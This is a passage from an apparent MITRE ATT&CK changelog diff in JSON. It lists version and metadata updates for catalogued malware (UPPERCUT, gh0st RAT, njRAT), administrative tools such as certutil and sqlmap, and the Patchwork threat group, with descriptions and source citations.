<tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">C2)&nbsp;addresses.&nbsp;[Tsundere&nbsp;Botnet](https://attack.mitre.org/so</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;(C2)&nbsp;addresses.&nbsp;[Tsundere&nbsp;Botnet](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ftware/S9034)&nbsp;is&nbsp;attributed&nbsp;to&nbsp;a&nbsp;likely&nbsp;Russian-speaking&nbsp;thr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">software/S9034)&nbsp;is&nbsp;attributed&nbsp;to&nbsp;a&nbsp;likely&nbsp;Russian-speaking&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eat&nbsp;actor.&nbsp;&nbsp;A&nbsp;variant&nbsp;named&nbsp;DinDoor&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;[Mudd</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hreat&nbsp;actor.&nbsp;&nbsp;A&nbsp;variant&nbsp;named&nbsp;DinDoor&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;[Mu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">yWater](https://attack.mitre.org/groups/G0069)&nbsp;operations&nbsp;an</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ddyWater](https://attack.mitre.org/groups/G0069)&nbsp;operations&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;uses&nbsp;the&nbsp;Deno&nbsp;runtime&nbsp;for&nbsp;execution&nbsp;rather&nbsp;than&nbsp;Node.js.<span class=\"diff_sub\">&nbsp;</span>(</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">and&nbsp;uses&nbsp;the&nbsp;Deno&nbsp;runtime&nbsp;for&nbsp;execution&nbsp;rather&nbsp;than&nbsp;Node.js.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Citation:&nbsp;Checkpoint_MOISCyberCrime_Mar2026)(Citation:&nbsp;SOCRa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Checkpoint_MOISCyberCrime_Mar2026)(Citation:&nbsp;SOCR</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dar_MuddyWaterDindoor_Mar2026)(Citation:&nbsp;CAL_MuddyWater_Mar2</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">adar_MuddyWaterDindoor_Mar2026)(Citation:&nbsp;CAL_MuddyWater_Mar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">026)(Citation:&nbsp;SecureListUbiedo_Tsundere_Nov2025)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">2026)(Citation:&nbsp;SecureListUbiedo_Tsundere_Nov2025)&nbsp;</td></tr>\n        </tbody>\n    </table>"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "UPPERCUT",
+                    "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a 32-bit HTTP-based backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2017.(Citation: FireEye APT10 Sept 2018) Once thought to be exclusive to [menuPass](https://attack.mitre.org/groups/G0045), [UPPERCUT](https://attack.mitre.org/software/S0275) was also observed being used by [menuPass](https://attack.mitre.org/groups/G0045)-associated [MirrorFace](https://attack.mitre.org/groups/G1054) during [Operation AkaiRy\u016b](https://attack.mitre.org/campaigns/C0060).(Citation: Trend Micro Earth Kasha Anel NOV 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0275",
+                            "external_id": "S0275"
+                        },
+                        {
+                            "source_name": "UPPERCUT",
+                            "description": "(Citation: FireEye APT10 Sept 2018)"
+                        },
+                        {
+                            "source_name": "ANEL",
+                            "description": "(Citation: FireEye APT10 Sept 2018)"
+                        },
+                        {
+                            "source_name": "Trend Micro Earth Kasha Anel NOV 2024",
+                            "description": "Hiroaki, H. (2024, November 26). Guess Who\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html"
+                        },
+                        {
+                            "source_name": "FireEye APT10 Sept 2018",
+                            "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "UPPERCUT",
+                        "ANEL"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-22 21:04:29.621000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-09-14 21:45:30.280000+00:00",
+                    "modified": "2026-05-12 15:12:00.741000+00:00",
+                    "name": "Wevtutil",
+                    "description": "[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0645",
+                            "external_id": "S0645"
+                        },
+                        {
+                            "source_name": "Wevtutil Microsoft Documentation",
+                            "description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Wevtutil"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Viren Chaudhari, Qualys",
+                        "Harshal Tupsamudre, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.741000+00:00\", \"old_value\": \"2026-04-17 14:19:59.238000+00:00\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-12-14 16:46:06.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "certutil",
+                    "description": "[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0160",
+                            "external_id": "S0160"
+                        },
+                        {
+                            "source_name": "TechNet Certutil",
+                            "description": "Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.",
+                            "url": "https://technet.microsoft.com/library/cc732443.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "certutil",
+                        "certutil.exe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-22 21:03:22.466000+00:00\"}}}",
+                    "previous_version": "1.6"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:24.937000+00:00",
+                    "modified": "2026-05-12 15:12:00.737000+00:00",
+                    "name": "gh0st RAT",
+                    "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0032",
+                            "external_id": "S0032"
+                        },
+                        {
+                            "source_name": "gh0st RAT",
+                            "description": "(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)"
+                        },
+                        {
+                            "source_name": "Mydoor",
+                            "description": "(Citation: Novetta-Axiom)"
+                        },
+                        {
+                            "source_name": "Moudoor",
+                            "description": "(Citation: Novetta-Axiom)"
+                        },
+                        {
+                            "source_name": "FireEye Hacking Team",
+                            "description": "FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html"
+                        },
+                        {
+                            "source_name": "Novetta-Axiom",
+                            "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.",
+                            "url": "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
+                        },
+                        {
+                            "source_name": "Nccgroup Gh0st April 2018",
+                            "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.",
+                            "url": "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/"
+                        },
+                        {
+                            "source_name": "Arbor Musical Chairs Feb 2018",
+                            "description": "Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.",
+                            "url": "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "gh0st RAT",
+                        "Mydoor",
+                        "Moudoor"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "3.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.737000+00:00\", \"old_value\": \"2024-05-07 19:07:45.403000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.3"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:02.863000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "ipconfig",
+                    "description": "[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0100",
+                            "external_id": "S0100"
+                        },
+                        {
+                            "source_name": "TechNet Ipconfig",
+                            "description": "Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb490921.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "ipconfig"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:12:13.437000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:03.773000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "nbtstat",
+                    "description": "[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0102",
+                            "external_id": "S0102"
+                        },
+                        {
+                            "source_name": "TechNet Nbtstat",
+                            "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc940106.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "nbtstat"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2025-04-25 14:45:26.343000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:04.545000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "netstat",
+                    "description": "[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0104",
+                            "external_id": "S0104"
+                        },
+                        {
+                            "source_name": "TechNet Netstat",
+                            "description": "Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb490947.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "netstat"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2024-11-27 21:54:49.561000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-04 17:52:28.806000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "njRAT",
+                    "description": "[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0385",
+                            "external_id": "S0385"
+                        },
+                        {
+                            "source_name": "LV",
+                            "description": "(Citation: Fidelis njRAT June 2013)"
+                        },
+                        {
+                            "source_name": "Bladabindi",
+                            "description": "(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)"
+                        },
+                        {
+                            "source_name": "FireEye Njw0rm Aug 2013",
+                            "description": "Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200302085808/https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html"
+                        },
+                        {
+                            "source_name": "Fidelis njRAT June 2013",
+                            "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.",
+                            "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf"
+                        },
+                        {
+                            "source_name": "Trend Micro njRAT 2018",
+                            "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/"
+                        },
+                        {
+                            "source_name": "Njw0rm",
+                            "description": "Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "njRAT",
+                        "Njw0rm",
+                        "LV",
+                        "Bladabindi"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-16 15:13:03.813000+00:00\"}}}",
+                    "previous_version": "1.7"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "sqlmap",
+                    "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0225",
+                            "external_id": "S0225"
+                        },
+                        {
+                            "source_name": "sqlmap Introduction",
+                            "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.",
+                            "url": "http://sqlmap.org/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "sqlmap"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-19 18:21:12.122000+00:00\"}}}",
+                    "previous_version": "1.1"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "groups": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:07.145000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Patchwork",
+                    "description": "[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+                    "aliases": [
+                        "Patchwork",
+                        "Hangover Group",
+                        "Dropping Elephant",
+                        "Chinastrats",
+                        "MONSOON",
+                        "Operation Hangover"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0040",
+                            "external_id": "G0040"
+                        },
+                        {
+                            "source_name": "Patchwork",
+                            "description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
+                        },
+                        {
+                            "source_name": "Chinastrats",
+                            "description": "(Citation: Securelist Dropping Elephant)"
+                        },
+                        {
+                            "source_name": "Dropping Elephant",
+                            "description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
+                        },
+                        {
+                            "source_name": "Hangover Group",
+                            "description": "[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)"
+                        },
+                        {
+                            "source_name": "Cymmetria Patchwork",
+                            "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+                        },
+                        {
+                            "source_name": "Operation Hangover May 2013",
+                            "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20140424084220/http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf"
+                        },
+                        {
+                            "source_name": "Symantec Patchwork",
+                            "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
+                            "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries"
+                        },
+                        {
+                            "source_name": "Unit 42 BackConfig May 2020",
+                            "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.",
+                            "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/"
+                        },
+                        {
+                            "source_name": "Operation Hangover",
+                            "description": "It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
+                        },
+                        {
+                            "source_name": "Securelist Dropping Elephant",
+                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant \u2013 aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.",
+                            "url": "https://securelist.com/the-dropping-elephant-actor/75328/"
+                        },
+                        {
+                            "source_name": "PaloAlto Patchwork Mar 2018",
+                            "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
+                        },
+                        {
+                            "source_name": "TrendMicro Patchwork Dec 2017",
+                            "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
+                            "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
+                        },
+                        {
+                            "source_name": "Volexity Patchwork June 2018",
+                            "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
+                            "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+                        },
+                        {
+                            "source_name": "MONSOON",
+                            "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)"
+                        },
+                        {
+                            "source_name": "Forcepoint Monsoon",
+                            "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.",
+                            "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2025-10-21 23:13:16.458000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.7\", \"old_value\": \"1.6\"}}}",
+                    "previous_version": "1.6",
